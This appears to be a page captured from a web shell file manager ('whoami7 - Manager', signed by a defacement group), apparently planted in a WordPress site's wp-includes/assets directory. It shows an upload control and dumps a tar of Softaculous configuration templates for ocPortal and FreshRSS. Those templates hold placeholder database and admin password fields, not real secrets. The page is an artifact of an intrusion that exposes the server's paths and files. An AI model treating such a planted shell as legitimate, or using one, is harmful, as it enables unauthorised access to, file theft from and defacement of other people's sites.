whoami7 - Manager
:
/
home
/
creaupfw
/
www
/
wp-includes
/
assets
/
Upload File:
files >> /home/creaupfw/www/wp-includes/assets/_config.php.tar
var/softaculous/ocportal/_config.php 0000644 00000003006 15036601270 0013642 0 ustar 00 <?php global $SITE_INFO; if (!function_exists('git_repos')) { /** * Find the git branch name. This is useful for making this config file context-adaptive (i.e. dev settings vs production settings). * * @return ?ID_TEXT Branch name (null: not in git) */ function git_repos() { $path = dirname(__FILE__).'/.git/HEAD'; if (!is_file($path)) return ''; $lines = file($path); $parts = explode('/', $lines[0]); return trim(end($parts)); } } $SITE_INFO['default_lang'] = 'EN'; $SITE_INFO['forum_type'] = 'cns'; $SITE_INFO['db_type'] = 'mysqli'; $SITE_INFO['domain'] = '[[domhost]]'; $SITE_INFO['base_url'] = '[[softurl]]'; $SITE_INFO['master_password'] = '[[admin_pass_info]]'; $SITE_INFO['self_learning_cache'] = '1'; $SITE_INFO['db_site'] = '[[softdb]]'; $SITE_INFO['db_site_host'] = '[[softdbhost]]'; $SITE_INFO['db_site_user'] = '[[softdbuser]]'; $SITE_INFO['db_site_password'] = '[[softdbpass]]'; $SITE_INFO['table_prefix'] = '[[dbprefix]]'; $SITE_INFO['user_cookie'] = 'cms_member_id'; $SITE_INFO['pass_cookie'] = 'cms_member_hash'; $SITE_INFO['cookie_domain'] = ''; $SITE_INFO['cookie_path'] = '/'; $SITE_INFO['cookie_days'] = '120'; $SITE_INFO['db_forums'] = '[[softdb]]'; $SITE_INFO['db_forums_host'] = '[[softdbhost]]'; $SITE_INFO['db_forums_user'] = '[[softdbuser]]'; $SITE_INFO['db_forums_password'] = '[[softdbpass]]'; $SITE_INFO['cns_table_prefix'] = '[[dbprefix]]'; $SITE_INFO['multi_lang_content'] = '0'; $SITE_INFO['session_cookie'] = '[[cms_session]]'; var/softaculous/freshrss/_config.php 0000644 00000006110 15036605447 0013667 0 ustar 00 <?php return array ( 'enabled' => true, 'is_admin' => true, 'language' => '[[language]]', 'timezone' => '', 'archiving' => array ( 'keep_period' => 'P3M', 'keep_max' => 200, 'keep_min' => 50, 'keep_favourites' => true, 'keep_labels' => true, 'keep_unreads' => false, ), 'ttl_default' => 3600, 'dynamic_opml_ttl_default' => 43200, 'mail_login' => '', 'email_validation_token' => '', 'token' => '', 'passwordHash' => '[[admin_pass]]', 'apiPasswordHash' => '', 'feverKey' => '', 'posts_per_page' => 20, 'since_hours_posts_per_rss' => 168, 'max_posts_per_rss' => 400, 'view_mode' => 'normal', 'default_view' => 'adaptive', 'default_state' => 2, 'show_fav_unread' => false, 'auto_load_more' => true, 'display_posts' => false, 'display_categories' => 'active', 'show_tags' => 'f', 'show_tags_max' => 7, 'show_author_date' => 'h', 'show_feed_name' => 'a', 'show_article_icons' => 't', 'hide_read_feeds' => true, 'onread_jump_next' => true, 'lazyload' => true, 'sides_close_article' => false, 'sticky_post' => true, 'reading_confirm' => false, 'auto_remove_article' => false, 'mark_updated_article_unread' => false, 'sort' => 'id', 'mark_read_button' => 'big', 'sort_order' => 'DESC', 'anon_access' => false, 'mark_when' => array ( 'article' => true, 'gone' => false, 'max_n_unread' => false, 'reception' => false, 'same_title_in_feed' => false, 'scroll' => false, 'focus' => false, 'site' => true, ), 'filters' => array ( ), 'theme' => 'Origine', 'darkMode' => 'auto', 'content_width' => 'thin', 'shortcuts' => array ( 'actualize' => 'q', 'mark_read' => 'r', 'mark_favorite' => 'f', 'go_website' => 'space', 'next_entry' => 'j', 'next_unread_entry' => 'h', 'prev_entry' => 'k', 'skip_next_entry' => 'n', 'skip_prev_entry' => 'p', 'first_entry' => 'home', 'last_entry' => 'end', 'collapse_entry' => 'c', 'load_more' => 'm', 'mylabels' => 'l', 'auto_share' => 's', 'focus_search' => 'a', 'user_filter' => 'u', 'help' => 'f1', 'close_dropdown' => 'escape', 'normal_view' => '1', 'global_view' => '2', 'reading_view' => '3', 'toggle_media' => 'v', ), 'show_favicons' => true, 'icons_as_emojis' => false, 'simplify_over_n_feeds' => 1000, 'topline_read' => true, 'topline_favorite' => true, 'topline_myLabels' => false, 'topline_sharing' => false, 'topline_website' => 'full', 'topline_thumbnail' => 'none', 'topline_summary' => false, 'topline_display_authors' => false, 'topline_date' => true, 'topline_link' => true, 'bottomline_read' => true, 'bottomline_favorite' => true, 'bottomline_sharing' => true, 'bottomline_tags' => true, 'bottomline_myLabels' => true, 'bottomline_date' => true, 'bottomline_link' => true, 'sharing' => array ( ), 'queries' => array ( ), 'html5_notif_timeout' => 0, 'show_nav_buttons' => true, 'extensions_enabled' => array ( ), 'retrieve_extension_list' => true, 'extensions' => array ( ), );
Copyright ©2021 || Defacer Indonesia